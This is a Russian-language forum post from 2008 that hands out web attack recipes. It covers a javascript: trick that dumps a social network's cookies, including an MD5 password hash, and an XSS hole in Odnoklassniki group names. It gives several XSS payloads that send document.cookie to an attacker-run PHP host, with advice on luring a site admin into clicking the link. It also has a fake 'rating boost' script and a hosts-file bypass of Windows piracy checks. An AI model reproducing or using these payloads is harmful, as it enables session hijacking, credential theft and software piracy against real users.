Выцепить пароль из кукисов: пользователь входит на страничку под своим аккаунтом, затем в url ввести javascript:document.write(document.cookie) Получаем: remixchk=5; remixmid=1892135; remixemail=<user>%40mail.ru; remixpass=32105a88942c409249c3710882ca57c4; remixlang=0; remixautobookmark=2
расшифровываем remixpass, который является MD5 хэшем и вуа-ля:)
Отправлено: 06.11.08 14:22. Заголовок: Дыра в одноклассника..
Дыра в одноклассниках:
Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... но она легко снимается оперой:)))
Пример названия группы: </title><script>alert('Андрюха мегакрут!!!!!!!!!!!')</script>
Дальше идём на любой халявный хост с поддержкой php (пример, http://holm.ru) Регим там свой акк... заливаем туда это скрипт (css.php) Дальше... узнаём мыло админа... и кидаем ему такую ссылку и пишем типо нашёл опечатку или ещё что-то... короч посмотрите... Ссылка должна быть такая: http://site.com/q=<script>document.location.replace('http://твой_сайт.ru/css.php?'+document.cookie)</script> или ещё вариант http://site.com/q=<script>open('http://твой_сайт.ru/css.php?'+document.cookie)</script> или http://site.com/q=<script>var i=new Image(); i.src='http://твой_сайт.ru/css.php?+dociment.cookie';</script>
где "http://site.com/q=" - это тот параметр, где ты нашёл xss багу...
Вроже бы всё... и потом глядишь и админские кукисы у тебя
код в циферках аналогичен: var ratenum = prompt('На сколько поднять рейтинг ?');alert('Рейтинг успешно поднян на '+ratenum+' единиц - перезайдите пожайлуста для активации .');document.innerHtml='<iframe src="http://vkontakte.ru" width="100%" height="100%" frameborder="0">';
отключение проверки windows добавить в hosts 127.0.0.1 mpa.one.microsoft.com
"Взять к примеру дядю Билла - наворотил свой Виндовс ХР так. что тот теперь требует проверки подлинности и не дает обновляться пиратским копиям (затратили на это наверное миллионы...). А выход до жути прост - открываем в редактре файл hosts (%SystemRoot%\system32\drivers\etc\hosts) и вписываем в него такую строку: 127.0.0.1 mpa.one.microsoft.com, после чего удаляем файл "%ALLUSERSPROFILE%\Application Data\Windows Genuine Advantage\data\data.dat". Все! Теперь спокойно идем на Windows Update и обновляем систему. Гениально просто! Сам таким образом обновляюсь уже три месяца и поставил ИЕ7 и последний ВМ плейер." - конец цитаты.
Все даты в формате GMT
3 час. Хитов сегодня: 3
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация вкл, правка нет